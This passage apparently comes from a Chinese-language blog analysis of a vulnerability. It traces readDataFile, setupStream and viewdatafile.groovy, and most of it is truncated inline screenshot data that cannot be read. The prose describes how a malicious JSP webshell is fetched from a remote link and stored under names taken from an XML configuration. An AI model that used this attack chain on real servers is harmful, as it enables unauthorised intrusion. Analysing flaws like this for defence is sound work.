<p blockindex=31><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA3IAAACECAYAAADV9Bl4AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOy9Z5Nk15mg95xzXXpX3pv2Dm3QBh4gCRAkhzNUaMdoJa3mw/4A/Rx9VIRWE7ERq53QanZmODMkhyRAuIZrtO+uri7vKysrfea99xx9yKzqqmoPomEG50EgUMjMe483rznvEaefP6d5hnieSzIep1DYoFqtbn8upSSVSmHbNhsbG4Rh+Cyz8YQIhAQ7GaHrSIra3TyF1QC0Rut7v/F6EvQcjlO+lWdjsckzrUCDwWAwGAwGg8HwTOnt7WVxcREhxDedlSfGftYJhGFIo9G4T1BTSlGr1YjFYt+aChOuQ3ZfFBGA41nozijZtKY2X6VWaeVfujbJ/ii6VKO85hshzmAwGAwGg8FgMHztPHNBDgABsViMSCSy/ZFSijAM0frbIwoJIbCiLvGsSzzn4nsauVajLrZ/gJuLEk9Jijeq+P63J+8Gg8FgMBgMBoPh+4P8uhLaEtx2/vttEuIAVKNB/maRWlWj/BC/4rM5Wd62xglLkhyKt6xx64GxxhkMBoPBYDAYDIZvhK/HIqc19XqdRqOxLbwJIfA871vjVrmFk/KIuCErX5SJ9ESIph2qxQCtNE5nklSHYP2jMn5gxDiDwWAwGAwGg8HwzfA1uVYKpJRYlrXrYym/NoPgE+MXaqxcqtEsh1hrdUTQshxq6dBxPE24sEYxHwDfLgHUYDAYDAaDwWAwfH/4GgQ5geO45HIRQqWIx6JUKhWUUliWRRiG3yqrXFjzqdXafxebrT+UILI/Sy7hM/VOBWWEOIPBYDAYDAaDwfAN8rVErSyVygghUFoTjUTY3NzcjmKptSYIgmedjT+OiEPHaITilVWqjW86MwaDwWAwGAwGg+H7zjMX5LTW+EErMIjWGq0VzWaDIGgHEPkWWeMeih+w/O48OlAmwInBYDAYDAaDwWD4xvl6zsix90SZ+G4IcFtoTdg0IpzBYDAYDAaDwWD4dvDtizZiMBgMBoPBYDAYDIZHYgQ5g8FgMBgMBoPBYPiOYQQ5g8FgMBgMBoPBYPiOYQQ5g8FgMBgMBoPBYPiOYQQ5g8FgMBgMBoPBYPiOYQQ5g8FgMBgMBoPBYPiO8bVdP/BdRkiJJSAM779HTkgLy5I8+DIFjQpDlBZI2Xp+x5NIKdBaoc3NBgaDwWAwGAwGg+Ep+B4LcgLHdUApgvaF5Q8jlulnqMNifmaWUmOHMKYt0l09ZCIOoVYIbLyoS1CvEmiBY1vUNtdYLUNPb4bKyiKFmo/WIKRHtjtNo5CnVPNp3a33rMtsMBgMBoPBYDAY/i3wvRTkhOWQzHYz1JUgv7LIcr74UKuYHcsw0NdJ3LMY7q1ybXp1W+jT2iKRS2JvFijUGth2kkxPF5ubSxQbNtmublLxKGuVKqGIMzDUj7VcIZpN4soIHT0ZGoU0pZpPo7rByvImgRHmDAaDwWAwGAwGw2P43glyQkgS2S46Uy6W5eA4D6kCDSKSZHCoD705y7X1gP6xUYa6qsyultFtZ0qtFYHv02g0UapJEIT4zSbNpsIPQhytiWe6ScsSCyslGo2AoKhwZEAsE6FWLrJZbhL4DZQR4gyGJ0aIrTFofJMNBoPBYDB8//jeCXJaKyobyzSqUYb6XZR+sPQkvTj9AwNE/AILpZBYRDE/NcfQ+Bi94QRL+VrLMqddcv0DxPwQaXmkkwkig6OkQ4tYPEp1ZZOwUMUZGiBbq3B3o0SlVkZaPsmuGOXCBuubdTQCIYx7pcFgMBgMBoPBYHg83ztBDkCFIWGgHvq9E00yODqKU11jen4Fp3sf450+X1yeZHbaYWxkH443x8xyE8f2WZqYYa5UxXYzjB0eJX/7Cmt1m66BEXJSUS2vcv1SkWQ8yvhzZ+mIOghhE0tECLI5xgINYY3ZO7dZ3KhipDmD4eHYdmvakrIVdLfZbH6T2TEYDAaDwWD4RvheCnKPQkiLTLYDf32WqdUCWgscTfsMnaZeWuL2RJme7hydqQqWsIlnMnS4ESwnQSziEWQ7UE2bVCKKVasAkkTnECOpGjduXGIKl57BEXIbNSZnlmj4IQBKKSPEGQwGg8FgMBgMhsdiBLk9aBWyMn+XR0WRDOol5qaKiEiGLuliZ3J0xQOk5RGPRpC5LtzAIp6M0WhIhOWQ60hRXVukGUAsmyVhN5mfX8WKp+hQddY3yo+MnGkwGFpEo1EAGo3GN5wTg8FgMBgMhm+O77Ug17rD7X7xSTzWKiZASqKJOI5fZnJyimKtge1mGLfHWJ+8Sb7p0TUwREYrnEiGbCxkZrNKJNlFf1eK6uYydWWR6+hltMPFvX6ThUKFhzt8GgwGg8FgMBgMBkOL760gp8Im62urhH79sZawMGhQawS7rigQwiLqWmxsbNAIFFJaSAF+o4kTTdPX1UEm4VJZa2DHugg3Vyg1NMnOLJmEhwiy2BGFqpeYXxREO7uJlCaphOIhl4sbDN9vLMsCIBKJAFAul7/J7BgMBoPBYDB8o3xvBTkdBmwWNp7gTJqmXlhmqqwJdolYIeWNVcphiB+27GhhUGV5bgYdhriqQL2oqFUrhDLkTrFJM1QUV+e4XbQRQqDCJpVSBV9BJJYg1BghzmAwGAwGg8FgMDyW760gBzxxYJHQr1PxYZeYpTXNPWd0tA6pV6sA1Ov1dhICqLBlO2jWSjSq2xlAiFY2GrUyRowzGB5OJpMB7o0tc3+cwWAwGAyG7zPfb0HuGfLwc3bmrjiDwWAwGAwGg8Hwx2EEOYPhWSDg39ppR4FA6a8/HM/Wmbh4PA5AoVD42vNgMBgMBoPB8G3jqxXktCbV14Md81i/M/ME0R8Nhn97qFBx9qXzvPLGqwS+z3f/XgmNJS0ayuf/+j/+z23XRoPBYDAYDIYnwYp4xPu6Qcpdnwugni/QLBTNkYkvwVdukZO2xLKNoc/w/UWjySRS3Fy+w6WJK6h/AxNT1Ivwly//Ase22RLjtixlWwqbWq32TNJOp9MAhGG4678Gg8FgMBi+GwghkLYFQt73uZCyJdF997dLXztG4jIYngFaayq1KhvFwndew6TRNKNxAhV801kxGAwGg8FgMLR5IkHOtm2stinUDwLCMDRukwbDYxBCfKfHydYZP9uycG0XHSpS6TTpdvRIx3EQQrCysvJM0t+y+CUSCQBWV1efSToGg8Hw7aQVHO27rgw0GB6E1i0DnABjifsjeKQg53kew8PD9Pb14ToOIKhUykxNTbG8vPz9mlw0hIAUuy8J0Bp2hn/Y+/3O38ET33jwpdlqkadNRuuH5+2rybtGK43Sui3cCKR88hfq7eee6McorXZf4C5lS7Da8b7WF+3PtEJp3a4H+VR5+6ZQ7TYTsJ33nSPSkrvLq2FXHSilt/vuzt8+GRIv0UF3V4qgUSG/WWnXO+2602hFq35F62oO1U6sJeDK7f6klWr/7ql7LVrp7bbcauN2gWmVeGc6YbvOxFMJ2bpVEIQQ99J61LNat9tDIxAIS/7RYW9299dWuWnXodaq9f9b30u5o90VGoH8soO3XQ52tNfj8qm1aq/Ou8fRznp8qvTh3jjdk9bD3vWl0nrQe3b2za26kI9uzy/bzx6dEd0ONPSAd+4Y20/3Sg202/aPz+GTpNhO88nq5N5vn/Dt7XGwcw0U0trx/Fb6988JW+vRk88JIVpLhBT3FshnEJFaOHH6R8aJUWB2ep66/3Ru5dub5J2ffU17kS+LVqo95zzjfQIapfbsE0SrTR++T7i3t3i6fcLutASAlF9+Xv4jePS4un+MPCuEpejvazDSoVhdinBjHRqPf+zp0Dvmg10F2trrift+93Ryze73PNmcpff0uT++oh8qyLmuy2uvvUpHRycTExPMrq2hgcGBAX72Jz/j/ffe58aNG09c6G/pnPFEaA2xlORPBuA3NxXr7Yu7tYZEWvKLUYusA82m4r9fUyyEeld5bRvePOLgLwf8blUTPCP517KgJy4JmpqV+pMlojWk4oI+B+4UNe
<p blockindex=32>进入readDataFile方法</p>
<p blockindex=33>这里也有一个与之前类似的方法,读取外部的链接,然后setupStream方法保存</p>
<p blockindex=34><img src="data:image/png;base64,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
<p blockindex=35>在setupStream方法的调用流里面需要注意的点是,远程读取了恶意的jspshell之后,后续会根据之前读取的xml配置文件里面配置的length长度来读取,并且根据name属性来保存成一个key value的形式以便后续读取</p>
<p blockindex=36><img src="data:image/png;base64,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
<p blockindex=37>回到viewdatafile.groovy</p>
<p blockindex=38><img src="data:image/png;base64,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